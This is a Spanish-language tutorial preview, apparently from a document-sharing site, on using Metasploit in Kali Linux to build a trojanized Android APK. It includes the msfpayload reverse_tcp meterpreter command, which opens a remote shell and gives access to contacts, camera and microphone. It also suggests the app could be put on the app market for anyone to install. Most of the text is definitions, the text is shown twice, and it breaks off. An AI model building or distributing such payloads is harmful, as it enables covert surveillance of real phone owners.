Hacking tico Final
Páginas: 5 (1127 palabras)
Publicado: 6 de mayo de 2015
Hacking Ético: Hackear móvil Android usando Metasploit en Kali Linux
Algunas Palabras clave que conviene saber
Metasploit es un proyecto open source de seguridad informática que proporciona información acerca de vulnerabilidades de seguridad y ayuda en tests de penetración y en el desarrollo de firmas para sistemas de detección de intrusos.
Su subproyecto más conocido es el MetasploitFramework, una herramienta para desarrollar y ejecutar exploits contra una máquina remota.
Exploit (del inglés to exploit, "explotar" o 'aprovechar') es un fragmento de software, fragmento de datos o secuencia de comandos y/o acciones, utilizada con el fin de aprovechar una vulnerabilidad de seguridad de un sistema de información para conseguir un comportamiento no deseado del mismo.
Payload
Una payload esel código que queremos que el sistema se ejecute y que se va a seleccionar y entregado por el marco. Por ejemplo, un reverse shell es un payload que crea una conexión desde el equipo de destino del atacante como un símbolo del sistema (commmad prompt) de Windows, mientras que un bind shell es unpayload que “une (binds)” un símbolo del sistema (command prompt) para un puerto de escucha(listenning) en la máquina de destino, que el atacante puede conectarse. Una carga útil también podría ser algo tan simple como un par de comandos que se ejecutan en el sistema operativo de destino.
Msfconsole
Msfconsole es, con mucho, la parte más popular de Metasploit Framework, y por buenas razones. Es una de las herramientas más flexibles, con múltiples funciones, y bien soportada dentro del marco.Msfconsole ofrece una práctica interfaz todo- en-uno para casi todas las opciones y la configuración disponible en el Framework, es como una tienda de una sola parada para todos sus sueños de explotación. Usted puede utilizar Msfconsole hacerlo todo, incluyendo el lanzamiento de un exploit, cargando módulos auxiliares, realizando la enumeración, la creación de los oyentes, o correr explotaciónmasiva contra una red completa.
Aunque el Metasploit Framework está en constante cambio, un subconjunto de comandos se mantiene relativamente constantes. Por el dominio de los conceptos básicos de Msfconsole, usted será capaz de mantenerse al día con los cambios. Para ilustrar la importancia de Msfconsole de aprendizaje.
En la siguiente práctica vamos a utilizar una de las herramientas de Kali Linuxpara hackear un móvil con sistema operativo Android.
Lo que haremos será crear un archivo con extensión .apk (HackingNuevo.apk) el cual será una app más del móvil, si la subiese al market podría perfectamente descargarla cualquiera.
Al Descargarla e instalarla, me dará total acceso al móvil, como contactos, acceso a la cámara, registro de llamadas, información sobre el móvil, activar el micrófonoo la cámara…
Explicaremos los pasos 1 a 1 para poder hacer funcionar la practica correctamente.
Se puede usar una máquina virtual para Android con el virtualbox o el Genymotion que es un emulador de sistemas Androids.
La versión del sistema virtual es:
Sasung Galaxy Note – 2.3.7 –API 10 – 800x1280
La versión de la iso para virtualbox será:
Android x86-1.6-r2
Si vamos a usar VirtualBox hay queconfigurar la máquina virtual con adaptador red en modo: Adaptador Puente, y en la pestaña Avanzadas el tipo de Adaptador tiene que ser PCnet-FAST III
Esto es necesario para que el sistema operativo Android detecte la red de internet que estemos usando.
Si usamos Genymotion el solo configura todo.
También se puede hacer mediante wifi (Probar)
1. Iniciamos Kali Linux
2. Abrimos el terminal de root
3.Escribimos “ifconfig” para comprobar cuál es nuestra dirección IP
4. Abrimos otra pestaña en el terminal
5. Escribimos el siguiente comando: “msfpayload android/meterpreter/reverse_tcp LHOST= LPORT= R> NombreApp.apk
El componente msfpayload de Metasploit le permite generar código shell, ejecutables, y mucho más para su uso en...
Algunas Palabras clave que conviene saber
Metasploit es un proyecto open source de seguridad informática que proporciona información acerca de vulnerabilidades de seguridad y ayuda en tests de penetración y en el desarrollo de firmas para sistemas de detección de intrusos.
Su subproyecto más conocido es el MetasploitFramework, una herramienta para desarrollar y ejecutar exploits contra una máquina remota.
Exploit (del inglés to exploit, "explotar" o 'aprovechar') es un fragmento de software, fragmento de datos o secuencia de comandos y/o acciones, utilizada con el fin de aprovechar una vulnerabilidad de seguridad de un sistema de información para conseguir un comportamiento no deseado del mismo.
Payload
Una payload esel código que queremos que el sistema se ejecute y que se va a seleccionar y entregado por el marco. Por ejemplo, un reverse shell es un payload que crea una conexión desde el equipo de destino del atacante como un símbolo del sistema (commmad prompt) de Windows, mientras que un bind shell es unpayload que “une (binds)” un símbolo del sistema (command prompt) para un puerto de escucha(listenning) en la máquina de destino, que el atacante puede conectarse. Una carga útil también podría ser algo tan simple como un par de comandos que se ejecutan en el sistema operativo de destino.
Msfconsole
Msfconsole es, con mucho, la parte más popular de Metasploit Framework, y por buenas razones. Es una de las herramientas más flexibles, con múltiples funciones, y bien soportada dentro del marco.Msfconsole ofrece una práctica interfaz todo- en-uno para casi todas las opciones y la configuración disponible en el Framework, es como una tienda de una sola parada para todos sus sueños de explotación. Usted puede utilizar Msfconsole hacerlo todo, incluyendo el lanzamiento de un exploit, cargando módulos auxiliares, realizando la enumeración, la creación de los oyentes, o correr explotaciónmasiva contra una red completa.
Aunque el Metasploit Framework está en constante cambio, un subconjunto de comandos se mantiene relativamente constantes. Por el dominio de los conceptos básicos de Msfconsole, usted será capaz de mantenerse al día con los cambios. Para ilustrar la importancia de Msfconsole de aprendizaje.
En la siguiente práctica vamos a utilizar una de las herramientas de Kali Linuxpara hackear un móvil con sistema operativo Android.
Lo que haremos será crear un archivo con extensión .apk (HackingNuevo.apk) el cual será una app más del móvil, si la subiese al market podría perfectamente descargarla cualquiera.
Al Descargarla e instalarla, me dará total acceso al móvil, como contactos, acceso a la cámara, registro de llamadas, información sobre el móvil, activar el micrófonoo la cámara…
Explicaremos los pasos 1 a 1 para poder hacer funcionar la practica correctamente.
Se puede usar una máquina virtual para Android con el virtualbox o el Genymotion que es un emulador de sistemas Androids.
La versión del sistema virtual es:
Sasung Galaxy Note – 2.3.7 –API 10 – 800x1280
La versión de la iso para virtualbox será:
Android x86-1.6-r2
Si vamos a usar VirtualBox hay queconfigurar la máquina virtual con adaptador red en modo: Adaptador Puente, y en la pestaña Avanzadas el tipo de Adaptador tiene que ser PCnet-FAST III
Esto es necesario para que el sistema operativo Android detecte la red de internet que estemos usando.
Si usamos Genymotion el solo configura todo.
También se puede hacer mediante wifi (Probar)
1. Iniciamos Kali Linux
2. Abrimos el terminal de root
3.Escribimos “ifconfig” para comprobar cuál es nuestra dirección IP
4. Abrimos otra pestaña en el terminal
5. Escribimos el siguiente comando: “msfpayload android/meterpreter/reverse_tcp LHOST=
El componente msfpayload de Metasploit le permite generar código shell, ejecutables, y mucho más para su uso en...
Leer documento completo
Regístrate para leer el documento completo.